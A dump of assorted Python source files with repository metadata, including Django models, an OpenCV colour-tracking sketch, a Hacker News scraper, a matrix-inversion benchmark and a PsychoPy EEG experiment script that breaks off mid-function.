| permissive | lujung/python-spresso | faef8d092f2bde56ed318d52770d8cf38762ad2d | 32e0229abe9e18bbbe487184645d66ed1ed95a05 | refs/heads/master | 2021-01-21T06:30:45.630091 | 2017-03-01T20:01:26 | 2017-03-01T20:01:26 | 83,245,282 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 744 | py | import logging
from wsgiref.simple_server import make_server
from spresso.controller.application import Application
from spresso.controller.grant.authentication.core import \
ForwardAuthenticationGrant
from spresso.controller.grant.authentication.config.forward import \
Forward
from spresso.controller.web.wsgi import WsgiApplication
logging.basicConfig(level=logging.DEBUG)
# Create config
settings = Forward()
settings.scheme = "http"
# Create the controller
application = Application()
application.add_grant(ForwardAuthenticationGrant(settings=settings))
# Wrap the controller with the WSGI adapter
app = WsgiApplication(application)
if __name__ == "__main__":
httpd = make_server('', 8081, app)
httpd.serve_forever()
| [
"[email protected]"
]
| |
2ccf6e8187ca4ba55a24f1a28a9bc20379fa6251 | 397b0edb50c3838b6ee48822a1d2d0fcb645c1e2 | /utils/rehelper.py | 6626e15faaa0ebb8994c94bf3eb67cfdd62a9771 | []
| no_license | RonDen/spider-snippet | b3b935ca6e408abff1356b04dc75c4542b025c79 | 8d4b5bc2fea89fe3f595a5453c4abdb9b5ce44b8 | refs/heads/main | 2023-04-10T19:50:17.946004 | 2021-04-27T13:51:36 | 2021-04-27T13:51:36 | 362,125,388 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 123 | py | import re
_pattern = re.compile(r'\d+')
def reg_int(s: str):
res = _pattern.search(s)
return int(res.group(0))
| [
"[email protected]"
]
| |
4ea466b0e7f19e3d00272633e1cbbf7a91c65dba | 695182479b8dd493e038ac704caf0d440fab007c | /module_fundamental/m004_type_data_string.py | 833d41a62968bf795ee86dc13d8b618aae44a3dd | []
| no_license | algokelvin-373/PythonFundamental | 61dd395f7300d5d7e2f9f3963e3ac2c563e6e003 | eb2b29be75f69146addb952feb8b537099c1e09f | refs/heads/master | 2023-06-17T02:38:29.114093 | 2021-06-19T15:08:36 | 2021-06-19T15:08:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 455 | py | print("Basic Type Data -> String")
a = "Hello, I am Kelvin. I'm ready to learn Python Programming"
print("Value a = ", a, ", type = ", type(a)) # 'str' is String
# String version 1
b = "Hello, I am Kelvin. " \
"I'm ready to learn Python " \
"Programming"
print("Value b = ", b, ", type = ", type(b))
# String version 2
c = '''\nHello, I am Kelvin.
I'm ready to learn Python
Programming'''
print("Value c = ", c, ", type = ", type(c))
| [
"[email protected]"
]
| |
52b36ccf3da23038a20396094e5100821ad733d3 | 825c1e78ec108bbec59cba3cfc6e0e2bf4a92ca8 | /hello-world/hello_world.py | 73acacf6bb2ee2b0166e64c4a7bdbfd9cdd90a4c | [
"Unlicense"
]
| permissive | pierrebeaucamp/Exercism-Python | 52984866b9e552bc801da8ff7c77584bd28c1b4b | 910b764c6726e9f131fb3a394c70d9b5bb167be9 | refs/heads/master | 2021-01-10T06:16:18.262702 | 2016-01-11T02:00:08 | 2016-01-11T02:00:08 | 46,693,124 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 80 | py | def hello(name=''):
return "Hello, %s!" % (name if name != '' else "World")
| [
"[email protected]"
]
| |
b50ab0437bdeb0851adabcf7abdab17632f1e3ef | 82b495a208ebdeb71314961021fbfe767de57820 | /chapter-06/temperature.py | 6c3619f4fe12c91df242c2a86240bd498aa1abd1 | [
"MIT"
]
| permissive | krastin/pp-cs3.0 | 7c860794332e598aa74278972d5daa16853094f6 | 502be9aac2d84215db176864e443c219e5e26591 | refs/heads/master | 2020-05-28T02:23:58.131428 | 2019-11-13T13:06:08 | 2019-11-13T13:06:08 | 188,853,205 | 0 | 0 | MIT | 2019-11-13T13:06:09 | 2019-05-27T13:56:41 | Python | UTF-8 | Python | false | false | 469 | py | def convert_to_celsius(fahrenheit: float) -> float:
"""Return the number of Celsius degrees equivalent to fahrenheit
degrees.
>>> convert_to_celsius(75)
23.88888888888889
"""
return (fahrenheit - 32.0) * 5.0 / 9.0
def above_freezing(celsius: float) -> bool:
"""Return true if the temperature in celsius degrees is above freezing
>>> above_freezing(5.2)
True
>>> above_freezing(-2)
False
"""
return celsius > 0
| [
"[email protected]"
]
| |
60ac5b982c6ac4f885ed6ab7e93cac1fc67dca17 | f0b03d244e9183e84d93330ae9fa9670d8177424 | /simple_posts_posts/models.py | bd3fda25076257523a4565caea220ca2a055bc71 | []
| no_license | humble9706/facebook | 6ad73e5bacd4bf9e891247ecebdd0dbfbca6277a | 65ef792e70d63c69ccde30656250c5f886ff3e1e | refs/heads/master | 2020-04-19T01:53:29.455771 | 2019-01-28T02:58:47 | 2019-01-28T02:58:47 | 167,885,058 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,709 | py | from django.db import models
from django.conf import settings
from django.utils.text import slugify
from django.urls import reverse
class Post(models.Model):
author = models.ForeignKey(
settings.AUTH_USER_MODEL, on_delete=models.CASCADE, related_name='posts')
date = models.DateTimeField(auto_now_add=True)
status = models.BooleanField(default=True)
image = models.ImageField(upload_to='Images')
title = models.CharField(max_length=100)
body = models.TextField(blank=True)
slug = models.SlugField(max_length=100)
likes = models.ManyToManyField(
settings.AUTH_USER_MODEL, related_name='liked', blank=True)
total_likes = models.PositiveIntegerField(db_index=True, default=0)#for purposes of denormalisation.
class Meta:
ordering = ('-total_likes', 'date')
def __str__(self):
return self.title
# Use this method to automatically set the slug of the image.
def save(self, *args, **kwargs):
if not self.slug:
self.slug = slugify(self.title)
super(Post, self).save(*args, **kwargs)
def get_absolute_url(self):
return reverse('posts:post_detail', args=[self.date.year, self.date.month, self.date.day, self.slug, self.id])
class Comment(models.Model):
post = models.ForeignKey(Post, on_delete=models.CASCADE, related_name='comments')
writer = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE, related_name='comment', blank=True, null=True)
date = models.DateTimeField(auto_now_add=True)
body = models.TextField()
status = models.BooleanField(default=True)
def __str__(self):
return '{} commented on {}'.format(self.writer, self.post) | [
"[email protected]"
]
| |
d6ee5dc1abe1d518d68ca2e2446b88515339d72a | 92cec18f145b71403d4c5511084a0da5fdeca9fb | /tests/test_bem_filesystem.py | 14ce83ae0635b4f6c0f08f8a41a49b1b55f6bac2 | []
| no_license | Zed-chi/bem_fs | 12b320861c5984df0a222a6f4548f30a3de2a78d | a013e4d31eddd343d35a5edb3f99ef36535c73d4 | refs/heads/master | 2022-11-06T17:16:05.292183 | 2020-06-30T05:22:42 | 2020-06-30T05:22:42 | 275,676,651 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 95 | py | from bem_filesystem import __version__
def test_version():
assert __version__ == "0.1.0"
| [
"[email protected]"
]
| |
3e71b79db3247270ca6a277a25362246fb8b342c | d43272ae0c112f84041d22e1012e4d31a869fbf3 | /news/models.py | c6d89836c3f2d9463a175f2656a94faae77aeb41 | []
| no_license | abhishek1404/my-first-blog | 82309c26d42d0684ed03e7c1aeca13b13e3b13e5 | 5b1a8f2daeb58e38585198b7eed9ae5bb6dba894 | refs/heads/master | 2021-01-10T14:49:49.525900 | 2016-02-21T08:37:47 | 2016-02-21T08:37:47 | 43,903,212 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 648 | py | from django.db import models
from django.utils import timezone
# Create your models here.
class Post(models.Model):
"an Article pusted on by any user"
title = models.TextField(blank=True)
author = models.TextField(blank=True)
created = models.DateTimeField(auto_now_add=True)
tags = models.ManyToManyField('Tag', related_name='tag_posts', blank=True,null=True)
content = models.TextField(blank=True)
def __str__(self):
return self.title
class Tag(models.Model):
"""
Defines a keyword categorisation for posts
"""
name = models.CharField(max_length=50)
def __unicode__(self):
return self.name
| [
"[email protected]"
]
| |
a12343947c99a0584b18996596487918113884d1 | 255e19ddc1bcde0d3d4fe70e01cec9bb724979c9 | /all-gists/1360455/snippet.py | ff62eb5f770ed285b9b8fdc6e6f331c6b6e4e651 | [
"MIT"
]
| permissive | gistable/gistable | 26c1e909928ec463026811f69b61619b62f14721 | 665d39a2bd82543d5196555f0801ef8fd4a3ee48 | refs/heads/master | 2023-02-17T21:33:55.558398 | 2023-02-11T18:20:10 | 2023-02-11T18:20:10 | 119,861,038 | 76 | 19 | null | 2020-07-26T03:14:55 | 2018-02-01T16:19:24 | Python | UTF-8 | Python | false | false | 3,727 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Done under Visual Studio 2010 using the excelent Python Tools for Visual Studio
# http://pytools.codeplex.com/
#
# Article on ideas vs execution at: http://blog.databigbang.com/ideas-and-execution-magic-chart/
import urllib2
import json
from datetime import datetime
from time import mktime
import csv
import codecs
import cStringIO
class CSVUnicodeWriter: # http://docs.python.org/library/csv.html
"""
A CSV writer which will write rows to CSV file "f",
which is encoded in the given encoding.
"""
def __init__(self, f, dialect=csv.excel, encoding="utf-8", **kwds):
# Redirect output to a queue
self.queue = cStringIO.StringIO()
self.writer = csv.writer(self.queue, dialect=dialect, **kwds)
self.stream = f
self.encoder = codecs.getincrementalencoder(encoding)()
def writerow(self, row):
self.writer.writerow([s.encode("utf-8") for s in row])
# Fetch UTF-8 output from the queue ...
data = self.queue.getvalue()
data = data.decode("utf-8")
# ... and reencode it into the target encoding
data = self.encoder.encode(data)
# write to the target stream
self.stream.write(data)
# empty queue
self.queue.truncate(0)
def writerows(self, rows):
for row in rows:
self.writerow(row)
def get_hackernews_articles_with_idea_in_the_title():
endpoint = 'http://api.thriftdb.com/api.hnsearch.com/items/_search?filter[fields][title]=idea&start={0}&limit={1}&sortby=map(ms(create_ts),{2},{3},4294967295000)%20asc'
incomplete_iso_8601_format = '%Y-%m-%dT%H:%M:%SZ'
items = {}
start = 0
limit = 100
begin_range = 0
end_range = 0
url = endpoint.format(start, limit, begin_range, str(int(end_range)))
response = urllib2.urlopen(url).read()
data = json.loads(response)
prev_timestamp = datetime.fromtimestamp(0)
results = data['results']
while results:
for e in data['results']:
_id = e['item']['id']
title = e['item']['title']
points = e['item']['points']
num_comments = e['item']['num_comments']
timestamp = datetime.strptime(e['item']['create_ts'], incomplete_iso_8601_format)
#if timestamp < prev_timestamp: # The results are not correctly sorted. We can't rely on this one. if _id in items: # If the circle is complete. return items prev_timestamp = timestamp items[_id] = {'id':_id, 'title':title, 'points':points, 'num_comments':num_comments, 'timestamp':timestamp} title_utf8 = title.encode('utf-8') print title_utf8, timestamp, _id, points, num_comments start += len(results) if start + limit > 1000:
start = 0
end_range = mktime(timestamp.timetuple())*1000
url = endpoint.format(start, limit, begin_range, str(int(end_range))) # if not str(int(x)) then a float gives in the sci math form: '1.24267528e+12'
response = urllib2.urlopen(url).read()
data = json.loads(response)
results = data['results']
return items
if __name__ == '__main__':
items = get_hackernews_articles_with_idea_in_the_title()
with open('hn-articles.csv', 'wb') as f:
hn_articles = CSVUnicodeWriter(f)
hn_articles.writerow(['ID', 'Timestamp', 'Title', 'Points', '# Comments'])
for k,e in items.items():
hn_articles.writerow([str(e['id']), str(e['timestamp']), e['title'], str(e['points']), str(e['num_comments'])])
# It returns 3706 articles where the query says that they are 3711... find the bug... | [
"[email protected]"
]
| |
41a05bf8566a0aaa78cd2a68971c5772b4e0c361 | 71fdffc6f4ed975d042073691960e554a2b76be0 | /Air Brush.py | 70ba0981586c27589e54a2deafc7f5fdb5bf4eca | []
| no_license | BhavyaShah1234/MyWholeImageProcessingFolder | 1abe4f1f35625daf5b0e532c4e285267cf90719e | fa8af03537c576c1c3661eb57a7346ab0db24f56 | refs/heads/main | 2023-04-05T00:25:24.932163 | 2021-04-08T07:04:04 | 2021-04-08T07:04:04 | 355,788,297 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,121 | py | import cv2
import numpy as np
frame_width = 800
frame_height = 600
brightness = 150
web_cam = cv2.VideoCapture(0)
web_cam.set(3, frame_width)
web_cam.set(4, frame_height)
web_cam.set(10, brightness)
my_colors = [[5, 107, 0, 19, 255, 255],
[133, 56, 0, 159, 156, 255],
[57, 76, 0, 100, 255, 255],
[90, 48, 0, 118, 255, 255]]
my_color_values = [[51, 153, 255],
[255, 0, 255],
[0, 255, 0],
[255, 0, 0]]
my_points = []
def find_color(img, colors, color_value):
img_hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
count = 0
new_point = []
for k in colors:
lower = np.array(k[0:3])
upper = np.array(k[3:6])
mask = cv2.inRange(img_hsv, lower, upper)
x, y = get_contours(mask)
cv2.circle(image_result, (x, y), 10, color_value[count], cv2.FILLED)
if x != 0 and y != 0:
new_point.append([x, y, count])
count = count + 1
cv2.imshow(f'{k[0]}', mask)
return new_point
def get_contours(img):
contours, hierarchy = cv2.findContours(img, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)
x = 0
y = 0
w = 0
for j in contours:
area = cv2.contourArea(j)
if area > 500:
cv2.drawContours(image_result, j, -1, (0, 255, 0), 4)
perimeter = cv2.arcLength(j, True)
approx = cv2.approxPolyDP(j, 0.02 * perimeter, True)
x, y, w, h = cv2.boundingRect(approx)
return x+w//2, y
def draw(points, color_values):
for point in points:
cv2.circle(image_result, (point[0], point[1]), 10, color_values[point[2]], cv2.FILLED)
while True:
success, image = web_cam.read()
image_result = image.copy()
new_points = find_color(image, my_colors, my_color_values)
for i in new_points:
if len(new_points) != 0:
my_points.append(i)
if len(my_points) != 0:
draw(my_points, my_color_values)
cv2.imshow('Air Brush', image_result)
cv2.waitKey(1)
| [
"[email protected]"
]
| |
3c095e405dc9ba2dd6771525f204117aed97ec9e | 01d2b2d99391c07c9e0bb3e2ce86db436c79f31b | /sgav/cars/forms.py | 133a63b1c44a702e9b1b75f37e60185849aa2ae4 | []
| no_license | daynaoliveira/sgav | 40b17b63fb58ac50f6aeed05de6ea75b0726caa0 | c4eae79cbe57737196d1af8197e878594655a797 | refs/heads/main | 2023-08-11T18:04:32.397912 | 2021-09-23T13:51:02 | 2021-09-23T13:51:02 | 358,619,279 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 244 | py | from django import forms
from django.db import models
from django.db.models import fields
from .models import Car
class CarForm(forms.ModelForm):
class Meta:
model = Car
fields = ('marca', 'modelo', 'placa', 'ano', 'cor')
| [
"[email protected]"
]
| |
d523298006de9cd021dfd6518d5dd86da298417b | 0ec88af9399ca8312cb408cb9b0344dd1c2fecee | /Program.py | 1538fea83915ee30f36b5d4e21e1aa2fe799dcb5 | []
| no_license | griselda-c/simulador-so-unqui | fad43e67b27897c6b65751b2654e4b5fe635ba79 | 970ab15a66e577d3ad304fcb89d4a79641653c3c | refs/heads/master | 2020-05-20T03:07:15.701394 | 2013-12-15T18:09:21 | 2013-12-15T18:09:21 | 32,224,746 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 277 | py |
class Program:
def __init__(self, nombre):
self.instrucciones = []
self.nombre = nombre
def addInstruction(self, instruccion):
self.instrucciones.append(instruccion)
def getCantInst(self):
return len(self.instrucciones) | [
"[email protected]@b104a250-5576-1979-6155-f292f37a00f3"
]
| [email protected]@b104a250-5576-1979-6155-f292f37a00f3 |
25ddfc25649e4f32fa7aca616751c0df603fbaa6 | d0705ffafbb53129bce83520e4a07362e1be8ff5 | /Auswertungskript.py | 0124a46447ab11271a7b82487a3337b99e0c2e8e | []
| no_license | rasefix/Semi-Stuff | 9d97bdb02bf052dc3fe210042e0cca1bad175fcf | f65556860971a90b8f8d4627fbea18fb057a14c5 | refs/heads/main | 2023-03-23T07:13:57.807010 | 2021-03-16T14:33:33 | 2021-03-16T14:33:33 | 348,387,474 | 0 | 0 | null | 2021-03-16T14:54:37 | 2021-03-16T14:54:35 | null | UTF-8 | Python | false | false | 489 | py | import openpyxl
a=0
b=2
while a==0:
temp=int(input("Temperatur:"))
konz=int(input("Konzentration:"))
if konz==5:
a=1
print("Messvorgang abgeschlossen")
else:
fileXLSX = openpyxl.load_workbook("Auswertung.xlsx")
sheet = fileXLSX["Tabelle1"]
sheet.cell(row=b, column=1).value = temp/1000
sheet.cell(row=b, column=2).value = konz/1000
fileXLSX.save('Auswertung.xlsx')
b=b+1
| [
"[email protected]"
]
| |
65db9b7872898345eee84550ab79aa3f9bbe16ab | 6ed034d0a5e239d7b0c528b287451409ffb4a494 | /mmpose/datasets/samplers/__init__.py | da09effaf20fefe1a102277672b98db7d884f002 | [
"Apache-2.0"
]
| permissive | ViTAE-Transformer/ViTPose | 8f9462bd5bc2fb3e66de31ca1d03e5a9135cb2bf | d5216452796c90c6bc29f5c5ec0bdba94366768a | refs/heads/main | 2023-05-23T16:32:22.359076 | 2023-03-01T06:42:22 | 2023-03-01T06:42:22 | 485,999,907 | 869 | 132 | Apache-2.0 | 2023-03-01T06:42:24 | 2022-04-27T01:09:19 | Python | UTF-8 | Python | false | false | 134 | py | # Copyright (c) OpenMMLab. All rights reserved.
from .distributed_sampler import DistributedSampler
__all__ = ['DistributedSampler']
| [
"[email protected]"
]
| |
90a7d506005f37668732ce2fbb68a6b27cd2b486 | f2e02a00604fcb52b7992535ad4e87f5368cb4a7 | /Entrega 6/INV_LLENAS.py | 5819f2385238e7dbbc66f1949998e6c7aef89e39 | []
| no_license | RobertoVergaraC/MCOC2021-P0 | 10cfdd36d703fe15d7ff765fdd1a44d379f4303a | c382cf2c158d5eb62a20708c58e1acdff3be1820 | refs/heads/main | 2023-07-14T20:38:47.824249 | 2021-09-02T23:24:05 | 2021-09-02T23:24:05 | 392,005,950 | 0 | 0 | null | 2021-08-02T15:43:35 | 2021-08-02T15:43:34 | null | UTF-8 | Python | false | false | 1,467 | py | from time import perf_counter
from numpy import zeros, logspace
from numpy import half, single, double, longdouble
from scipy.linalg import inv
def laplaciana(N, dtype):
A = zeros((N,N), dtype = dtype)
for i in range(N):
A[i,i] = 2
for j in range(max(0,i-2),i):
if abs(i - j) == 1:
A[i,j] = -1
A[j,i] = -1
return A
#Tamaño de N (finalmente serán 45 valores)
Nfake = logspace(0, 4, 50).tolist()
Nfake = [int(x) for x in Nfake]
Ns = []
for i in Nfake:
if i not in Ns:
Ns.append(i)
Ns.sort()
#Ns = [1, 10, 100, 1000]
#ESCOGEMOS EL MEJOR CASO DE INV
#CASO 3 INV LLENAS
#Creamos el documento .txt, en donde por línea habrán 3 listas [N, dt, mem]
fid = open("rendimiento_inv_llenas_caso_3.txt","w")
print("CASO 3 LLENAS INV")
for i in range(10):
print(f"Iteración {i+1}")
#Creamos listas vacías donde guardaremos la información
dts_ens = []
dts_sol = []
for N in Ns:
t1 = perf_counter()
#Creamos matrices
A = laplaciana(N, double)
#Medimos tiempo antes y después de inv de A
t2 = perf_counter()
Am1 = inv(A, overwrite_a=True)
t3 = perf_counter()
#Calculamos tiempo ensamblaje
dt_e = t2 - t1
#Calculamos tiempo solución
dt_s = t3 - t2
#Agregamos la información a cada lista
dts_ens.append(dt_e)
dts_sol.append(dt_s)
fid.write(f"{[Ns, dts_ens, dts_sol]}\n") #fid es así: [[Ns1],[dts_ens1],[dts_sol1]] \n [[Ns2],[dts_ens2],[dts_sol2]] \n ....
fid.close()
print("READY CASO 3 LLENAS INV") | [
"[email protected]"
]
| |
90e3d98c642160749d50467ed3d5a92d56c97b3c | 461a9e33aa76cd6f82f7e5ff23a1fafdc9d76e68 | /apps/departamentos/models.py | e2db1ee50345f31cf5aff78650fd3680a27c2844 | []
| no_license | alex7alves/Gestao_rh | 9bea77a62ca22701555465dd291ee8322da95e16 | 83d7f65cdf1a253cc59e24306874a0d0139ef2ca | refs/heads/master | 2020-08-02T13:52:28.041087 | 2019-10-10T18:37:39 | 2019-10-10T18:37:39 | 211,376,157 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 195 | py | from django.db import models
class Departamento(models.Model):
nome = models.CharField(max_length=200, help_text='Nome do departamento')
def __str__(self):
return self.nome
| [
"[email protected]"
]
| |
2fa3661ab59e5734ac5281fdfa08bbe6a00af969 | 91a65c33d13725771923de5cb54a70d10fe41733 | /companies/migrations/0005_permission_permission_role.py | 39c1b9385b8db1d7df3fc6f00765a6274bc9c7d5 | []
| no_license | georgid/Curation_Users | abdd87185a01f70b0c398cffa6aabbf05f4dc2fb | 847d4c7994cef02e0db6e7690fcb022ed0d64dff | refs/heads/master | 2022-05-18T01:31:55.049727 | 2019-06-14T13:25:09 | 2019-06-14T13:25:09 | 191,642,065 | 0 | 0 | null | 2022-04-22T21:32:37 | 2019-06-12T20:45:57 | Python | UTF-8 | Python | false | false | 1,316 | py | # Generated by Django 2.2.2 on 2019-06-12 16:11
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('companies', '0004_user_company_role'),
]
operations = [
migrations.CreateModel(
name='Permission',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50)),
('code', models.IntegerField()),
('Type', models.IntegerField()),
],
),
migrations.CreateModel(
name='Permission_Role',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('has_perm', models.BooleanField()),
('error_id', models.IntegerField()),
('permission', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='permission', to='companies.Permission')),
('role', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='role_id', to='companies.Role')),
],
),
]
| [
"[email protected]"
]
| |
743de3c696a558a9760587dc5f60b5a9a95f1bec | f5c4c04eb97875edea44ad3fa2fa07dcd40b031b | /tic-tac-toe/TicTacBoard.py | 426ef67c996a3cd66218dea548e62dda50f6297e | [
"MIT"
]
| permissive | gurjaspalbedi/reinforcement-learning | 62a4ce688e12a514cfe2b4790343bafd3c21502b | fcdd2b27500012f62cd0199614cfe71d2669e350 | refs/heads/master | 2020-04-17T19:46:17.875657 | 2019-02-19T02:07:21 | 2019-02-19T02:07:21 | 166,877,829 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 931 | py | import numpy as np
class TicTacBoard:
def __init__(self, board_size: int):
"""Initializing the board with size of the board
Parameters
----------
board_size : int
Size of the board
"""
self.board_size = board_size
def print_board(self, numerical_board):
"""Function that prints the board
Parameters
----------
numerical_board : List1D
The board that we want to print
"""
board = numerical_board.reshape(self.board_size, self.board_size)
for i in range(self.board_size):
for j in range(self.board_size):
print('1', end=" " ) if board[i][j] == 1 else (print ("2" , end=" ") if board[i][j] == 2 else print("O", end=" " ))
print("\n")
print("_____________________________________________________")
| [
"[email protected]"
]
| |
3aadb545d1e1259b22bd9d6ea8c2d056aa0dfaf5 | 8360a692a74be829cdbfd1d32a62f32633fe5c58 | /assignments/mydecrypt.py | 57555ca7fb04d5bb9b42122a5e1fd5f0b685a695 | []
| no_license | SimonJinaphant/Programming-11-Python | ef3fbd004d916ae161d8fda31f20a7ac4088b193 | 97c056f47ac598e703bc5dc4078966760770f232 | refs/heads/master | 2016-09-05T14:07:39.697568 | 2014-08-28T21:10:44 | 2014-08-28T21:10:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 460 | py | from sys import argv
with open(argv[1],'r') as f:
encrypted_data = [encoded.decode('utf-8')[:-1] for encoded in f.readlines()]
uncrypted_data = []
for s, sentence in enumerate(encrypted_data):
uncrypted_data.append(list())
for i, letter in enumerate(sentence):
#print letter
uncrypted_data[s].append(unichr((ord(letter)-0x4E00)^0x2D))
with open(argv[1],'w') as f2:
for s1, sen in enumerate(uncrypted_data):
f2.write(u"".join(sen).encode('utf-8'))
| [
"[email protected]"
]
| |
cd5d5b7af45e4e5c60a22b93e77ccd89fdd61255 | 5c24336c033b5dd02f1022f9da3f0aee670c5b2f | /MATLAB Installed/BIDS_resources/P032_EX2/Code/ElenaPreviewFinal.py | bb55e5c402ef3364ccbf855c98da957eda11c730 | [
"CC0-1.0"
]
| permissive | JohnTyCa/The-SPN-Catalogue | ab29e39ad42a1793f38448ac018dcf4918935013 | 75e729f867c275433b68807bc3f2228c57a3ccac | refs/heads/main | 2023-08-30T06:31:35.726302 | 2022-05-16T14:17:39 | 2022-05-16T14:17:39 | 321,381,577 | 2 | 0 | CC0-1.0 | 2022-05-16T14:17:40 | 2020-12-14T14:56:49 | Python | UTF-8 | Python | false | false | 14,562 | py | from numpy import * #many different maths functions
from numpy.random import * #maths randomisation functions
import math, numpy, random
import numpy as np
from psychopy import gui, visual, core, data, event, clock, sound
import os # handy system and path functions
import visualExtra
import serial, time
#ser = serial.Serial('COM3', 115200, timeout=100)
#s = ser.read(100)
#ser.write(chr(0).encode())
#ser.write(chr(0))
#ser.write(b'0')
#ser.write('0'.encode('ISO-8859-1')
expName='ElenaPreviewEEG'#from the Builder filename that created this script
expInfo={'participant':'','streoAcuity':0,'subN':0}
dlg=gui.DlgFromDict(dictionary=expInfo,title=expName)
if dlg.OK==False: core.quit() #user pressed cancel
expInfo['date']=data.getDateStr()#add a simple timestamp
expInfo['expName']=expName
if not os.path.isdir('dataPreviewEEG'):
os.makedirs('dataPreviewEEG')#if this fails (e.g. permissions) we will get error
filename= 'dataPreviewEEG/' + expName
seedN =1000 #this way every subject sees the same stimuli, use subject number to have unique stimuli peer subject instead
random.seed(seedN)
verticalSize = 1080
disp = 3
myWin = visual.Window(allowGUI=False, units='pix', size=(800,800), allowStencil=True, viewScale=[1.0, 0.5], fullscr= True, screen = 1)
#these lines are very powerful, they create all stimuli using the special functions of psychopy
fixation=visual.Circle(myWin, pos=[0, 0], radius = 10, fillColor= 'red', lineColor = None)#this is a gray cross for the fixation
responseScreen=visual.TextStim(myWin, ori=0, text = 'Symmetrical Asymmetrical', pos=[0,256], height= 25, color='blue', colorSpace='rgb', units= 'pix')
myTexture = numpy.random.randint(0,2,(256,256))-0.8
rdp0 = visual.GratingStim(myWin, tex=myTexture, size=[512,512])
myTexture = numpy.random.randint(0,2,(256,256))-0.8
rdp1 = visual.GratingStim(myWin, tex=myTexture, size=[512,512]) #, color= 'blue')
temp = visual.ShapeStim (myWin, lineColor= 'red', fillColor=None)
dot = visual.Circle (myWin, radius=10, lineColor= 'green', fillColor=None)
tempLine = visual.Line (myWin, lineColor = 'green', start = [0,0], end = [0, 360])
#print (stencil.vertices)
punishmentSoundDuration = 0.8
s1 = sound.Sound(200,secs=punishmentSoundDuration,sampleRate=44100)
upshift = verticalSize/2 #upshift value
baselineDuration = 1.5
myClock = core.Clock()#this creates and starts a clock which we can later read
def message(type, nBlocksToGo = 1):
if type == 'HelloPractice':
string = ('Welcome to the Practice Experiment. You will see LOTS of images. Your task is to decide whether they are symmetrical or asymmetical.')
elif type == 'HelloMain':
string = ('Now for the real thing, its the same, but much longer. Try too keep your eyes and the central cross and not to blink!')
elif type == 'Goodbye':
string = ('Thank you for taking part in the Experiment')
elif type == 'Break':
string = "{} Blocks to go".format(nBlocksToGo) #new style code for string formatting
#string = str(nBlocksToGo) + " Blocks to go"
instructions=visual.TextStim(myWin, ori=0, text=string, pos=[0, 256], height=25, color='white', colorSpace='rgb', units= 'pix')
instructions.setPos([-disp, -upshift/2])
instructions.draw()
instructions.setPos([0, upshift/2])
instructions.draw()
myWin.flip()
#creates a list of x,y coordinates around a cricle with a startradius and
#makes the shape symetrical if axes > 0
def makePattern(centrex, centrey, shape, nvertices, startradius, axes):
increment =float(math.pi * 2 / nvertices) # example: pi * 2 / 12 = 0.52359
peri =0
nConcave =0
deviation = startradius * .3 #whatever you pick as startradius, the deviation in or out from it is 30% of startradius
minConcave = int(nvertices / 3) #always minimum 33% concave vertices - so 4 in the case of 12, 16 for 48
minPeri = startradius * 2 * math.pi #always minimum the circumenference of the starting circle
while (peri <minPeri) or (nConcave < minConcave):
counter =0
coords =[]
angleInc =0.
deviationList =[]
angleList = []
for i in range(nvertices):
deviationList.append(startradius + uniform(-deviation, deviation))#uniform to generate random numbers in range
angleList.append(uniform (- 0.017, +0.017) ) #this is + or - 1 degree
if axes>0:
npersector = int(nvertices / (axes *2)) # 3
for i in range (nvertices - npersector):
p = int (i%npersector) #gets rid of the float
s = floor(i/npersector) + 1 #floor rounds it down
n = npersector - 1
deviationList[int(npersector*s + (n-p))] = deviationList[i]
angleList[int(npersector*s + (n-p))] = - angleList[i]
if shape=='circle':
while counter <nvertices: #angle < (2 * math.pi):
angleInc = angleInc + increment
angle = angleInc + angleList[counter]
b = deviationList[counter] #this is the deviation which is 33% of the startradius
a = 0 #this is 0% of b
c = math.sqrt(a*a * cos(2*angle) +math.sqrt(b*b*b*b - a*a * sin(2*angle)*sin(2*angle)))
y =cos(angle) * c
x =sin(angle) * c
coords.append([centrex+x,centrey+y])
counter =counter +1
peri =visualExtra.computePerimeter(coords)
cx, ce = visualExtra.computeAngles (coords)
nConcave = len(ce)
newcoords = visualExtra.rotateVertices(vertices = coords, a = numpy.rad2deg(increment/2))
return newcoords
#draw either the preview with stencilR or the stimulus with stencil
#stencilR or stencilL to create the asymmetry
def drawStim(sten, cond): #stencilL, stencilR,
# this is the preview
if cond == 'figure'or cond == 'ground': # cond in ['figure', 'ground']
sten.enabled = False
rdp0.setPos([0, -upshift])
rdp0.draw()
rdp0.setPos([0, upshift])
rdp0.draw()
if cond == 'figure':
sten.enabled = True
sten.inverted = False
rdp1.setPos([-disp, -upshift])
sten.setPos ([-disp, -upshift])
rdp1.draw()
rdp1.setPos([0, upshift])
sten.setPos ([0, upshift])
rdp1.draw()
elif cond == 'ground':
sten.enabled = True
sten.inverted = True
rdp1.setPos([-disp, -upshift])
sten.setPos ([-disp, -upshift])
rdp1.draw()
rdp1.setPos([0, upshift])
sten.setPos ([0, upshift])
rdp1.draw()
sten.enabled = False
fixation.setPos([-disp, -upshift])
fixation.draw()
fixation.setPos([0, upshift])
fixation.draw()
def responseCollect(trialType, screen, practiceExp):
event.clearEvents()
